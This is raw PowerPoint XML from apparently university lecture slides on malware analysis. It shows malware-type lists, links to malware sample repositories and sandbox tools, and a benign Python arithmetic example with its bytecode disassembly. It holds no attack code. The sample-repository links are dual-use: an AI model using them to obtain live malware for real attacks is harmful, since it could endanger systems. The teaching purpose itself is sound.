            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356520"/>
            <a:ext cx="2133360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6356520"/>
            <a:ext cx="2895120" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6356520"/>
            <a:ext cx="2133360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{B3AD9BB1-6424-4580-ACCC-5D306972A2C7}" type="slidenum">
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Click </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>edit </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>title </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>text </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="432000" indent="-324000">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356520"/>
            <a:ext cx="2133360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6356520"/>
            <a:ext cx="2895120" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6356520"/>
            <a:ext cx="2133360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{921290FF-CDEE-43B7-914A-8C2DA367E03D}" type="slidenum">
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea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10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10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Relationship Id="rId3"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slideLayout" Target="../slideLayouts/slideLayout13.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6.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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide116.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121.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12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123.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131.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13.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide131.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide13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5.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7.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8.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide13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141.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4.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9.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13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide149.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide1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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide150.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide151.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3.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide152.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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide152.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide153.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slideLayout" Target="../slideLayouts/slideLayout13.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide154.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xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide154.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide155.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
</Relationships>
</file>

<file path=ppt/slides/_rels/slide156.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide156.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide157.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide157.xml"/>
</Relationships>
</file>

<file path=ppt/slides/_rels/slide1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hyperlink" Target="https://scholar.google.com.vn/citations?hl=en&amp;user=zC4vaRAAAAAJ" TargetMode="External"/><Relationship Id="rId4"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hyperlink" Target="https://scholar.google.com.vn/citations?hl=en&amp;user=zC4vaRAAAAAJ" TargetMode="External"/><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slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId5"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hyperlink" Target="http://oc.gtisc.gatech.edu/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://virusshare.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.virusign.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thezoo.morirt.com/" TargetMode="External"/><Relationship Id="rId5"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docs.microsoft.com/en-us/previous-versions/ms809762(v=msdn.10)" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/quangngoc430/PeFile-View" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4"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hyperlink" Target="https://www.fireeye.com/services/freeware/apatedns.html" TargetMode="External"/><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hyperlink" Target="http://www.inetsim.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4"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gif"/><Relationship Id="rId3"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Relationship Id="rId3"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Relationship Id="rId3"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Relationship Id="rId3"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efd1"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="f0ebd5"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000"/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2130480"/>
            <a:ext cx="7772040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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Mal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>war</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Anal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="6400440" cy="1752120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Dr. Tran </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>The Son</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Vietnam – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Korea </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>University</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Types of Malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118"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Virus</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Worm</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Backdoor</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Trojan</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Rootkit</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Ransomware (Crypto-ransomware)</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Malicious Mobile Code</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Spyware/Adware</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Etc. DDoS</a:t>
            </a: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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573"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Operation +, -, ++, --, %</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395640" y="2205000"/>
            <a:ext cx="1944000" cy="338364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def main():</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a = 0</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b = 1</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a = a + 11</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a = a - b</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a-=1</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b+=1</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c=a*b</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c=a/b</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b = a % 3</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main()</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3116520" y="1730520"/>
            <a:ext cx="2781000" cy="4837320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>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1           0 LOAD_CONST               0 </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2 LOAD_CONST               1 ('main')</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4 MAKE_FUNCTION            0</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6 STORE_NAME               0 (main)</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12           8 LOAD_NAME                0 (main)</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10 CALL_FUNCTION            0</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12 POP_TOP</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14 LOAD_CONST               2 (None)</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16 RETURN_VALUE</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2           0 LOAD_CONST               1 (0)</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2 STORE_FAST               0 (a)</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3           4 LOAD_CONST               2 (1)</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6 STORE_FAST               1 (b)</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4           8 LOAD_FAST                0 (a)</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10 LOAD_CONST               3 (11)</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12 BINARY_ADD</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14 STORE_FAST               0 (a)</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5          16 LOAD_FAST                0 (a)</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18 LOAD_FAST                1 (b)</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20 BINARY_SUBTRACT</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22 STORE_FAST               0 (a)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156000" y="1362240"/>
            <a:ext cx="2759400" cy="5202360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="18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6          24 LOAD_FAST                0 (a)</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26 LOAD_CONST               2 (1)</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28 INPLACE_SUBTRACT</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30 STORE_FAST               0 (a)</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7          32 LOAD_FAST                1 (b)</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34 LOAD_CONST               2 (1)</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36 INPLACE_ADD</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38 STORE_FAST               1 (b)</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8          40 LOAD_FAST                0 (a)</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42 LOAD_FAST                1 (b)</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44 BINARY_MULTIPLY</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46 STORE_FAST               2 (c)</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9          48 LOAD_FAST                0 (a)</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50 LOAD_FAST                1 (b)</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52 BINARY_TRUE_DIVIDE</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54 STORE_FAST               2 (c)</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10          56 LOAD_FAST                0 (a)</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58 LOAD_CONST               4 (3)</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60 BINARY_MODULO</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62 STORE_FAST               1 (b)</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64 LOAD_CONST               0 (None)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>66 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578"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Condition</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
